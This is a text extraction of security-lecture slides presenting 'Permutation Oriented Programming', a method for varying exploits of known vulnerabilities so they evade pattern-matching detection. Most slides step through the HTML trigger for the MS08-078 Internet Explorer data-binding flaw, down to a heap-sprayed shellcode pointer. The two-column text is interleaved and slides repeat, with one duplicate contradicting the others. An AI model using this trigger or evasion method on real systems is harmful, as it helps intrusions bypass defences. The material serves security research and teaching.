7. Before starting
0-Day Pattern-matching
• 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past,
existence. but the security solution cannot rely only on this.
• Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching
0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that
released (which comes first). there is no vulnerability exploitation.
• So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action…
mitigated), 0-day has no more value. If you do not But what if the pattern is wrong?
believe me, you can try to sell a well-known
vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did
not match, is the correct approach for a protection
• Some security solutions fight against 0-day faster action? Was the detection really designed to detect
than the affected vendor. the vulnerability?
8. Some concepts
Exploitation Vulnerability
• There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the
the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation.
you to look for them for a better understanding.
• For some weakness types the vulnerability allows to
• This lecture has no pretension of being a complete control the flow of software’s execution, executing
reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE-
120, CWV-134, CWE-190, CWE-196, CWE-367, etc.
• The exploitation path described here is something
that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must
understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return
vulnerabilities. address, etc…), performing memory manipulation on
additional entities (such as: offset, register,
• All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment,
memory padding, etc).
– Common Vulnerabilities and Exposures.
– Common Vulnerability Scoring System.
– Common Weakness Enumeration.
10. What is Permutation Oriented Programming?
The scenario The technique
• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching
day faster than the affected vendor”. technology, there are two options:
– Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and (access to signature/vaccine).
sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the
applied. vulnerability and how to exploit it (access to
vulnerable ecosystem).
• People’s hope, consequently their security strategy,
resides on this security model: vulnerability mitigated, • Permutation Oriented Programming:
no patch… – Deep analysis of a vulnerability, (re)searching
for alternatives.
• But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives
be exploited, even on this security approach model? to offer a variety of decision points (variants).
– Intended to change the behavior of exploit
• According to pattern-matching, any new variant of an developers.
old vulnerability exploitation is considered a new – Use randomness to provide unpredictable
vulnerability, because there is no pattern to be payloads, i.e., permutation.
matched yet!
11. What is Permutation Oriented Programming?
The scenario The technique
• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching
day faster than the affected vendor”. technology, there are two options:
– Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and (access to signature/vaccine).
sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the
applied. vulnerability and how to exploit it (access to
vulnerable ecosystem).
• People’s hope, consequently their security strategy,
resides on this security model: vulnerability mitigated, • Permutation Oriented Programming:
no patch… – Deep analysis of a vulnerability, (re)searching
for alternatives.
• But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives
be exploited, even on this security approach model? to offer a variety of decision points (variants).
– Intended to change the behavior of exploit
• According to pattern-matching, any new variant of an developers.
old vulnerability exploitation is considered a new – Use randomness to provide unpredictable
vulnerability, because there is no pattern to be payloads, i.e., permutation.
matched yet!
12. What is Permutation Oriented Programming?
The scenario The technique
• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching
day faster than the affected vendor”. technology, there are two options:
– Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and (access to signature/vaccine).
sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the
applied. vulnerability and how to exploit it (access to
vulnerable ecosystem).
• People’s hope, consequently their security strategy,
resides on this security model: vulnerability mitigated, • Permutation Oriented Programming:
no patch… – Deep analysis of a vulnerability, (re)searching
for alternatives.
• But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives
be exploited, even on this security approach model? to offer a variety of decision points (variants).
– Intended to change the behavior of exploit
• According to pattern-matching, any new variant of an developers.
old vulnerability exploitation is considered a new – Use randomness to provide unpredictable
vulnerability, because there is no pattern to be payloads, i.e., permutation.
matched yet!
13. POP (pronounced /pŏp/) technique
The truth The examples
• POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities:
memory manipulation, rather than shellcode – it is – MS02-039: CVE-2002-0649/CWE-120.
neither a new polymorphic shellcode technique, nor – MS02-056: CVE-2002-1123/CWE-120.
an obfuscation technique.
• Client-side vulnerabilities:
• POP technique can be applied to work with Rapid7
Metasploit Framework, CORE Impact Pro, Immunity – MS08-078: CVE-2008-4844/CWE-367.
CANVAS Professional, and regular stand-alone – MS09-002: CVE-2009-0075/CWE-367.
proof-of-concepts (freestyle coding).
• Windows 32-bit shellcodes:
• POP technique is neither an additional entropy for – 波動拳: “CMD /k”.
tools mentioned above, nor an Advanced Evasion – 昇龍拳: “CMD /k set DIRCMD=/b”.
Technique (AET). Instead, POP technique can
empower both of them.
• All example modules were ported to work with
Rapid7 Metasploit Framework, but there are also
• POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript.
even using random decisions, it is able to achieve all
exploitation requirements.
53. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
54. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
55. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
56. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
57. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::CRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
58. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CCurrentRecordConsumer::Bind
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
59. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CCurrentRecordInstance::GetCurrentRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
60. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CXfer::CreateBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
61. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
62. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
63. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::AddBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
64. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CImplPtrAry::Append
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
65. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
66. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
67. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
68. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
69. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CRecordInstance::CRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
70. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CCurrentRecordConsumer::Bind
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
71. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CCurrentRecordInstance::GetCurrentRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
72. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CXfer::CreateBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
73. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
74. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
75. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CRecordInstance::AddBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
76. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CImplPtrAry::Append
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
77. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
78. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::TransferToDestination
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
79. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
80. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CXfer::TransferFromSrc
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
81. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
82. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::RemoveBinding
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
83. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
_MemFree
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
84. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
HeapFree
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
85. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
RtlFreeHeap
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
86. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
RtlpLowFragHeapFree
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
87. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CImplAry::Delete
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
88. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::Detach
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
89. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
90. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CXfer::TransferFromSrc
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
91. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
92. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
93. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
94. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
95. memory manipulation vulnerability
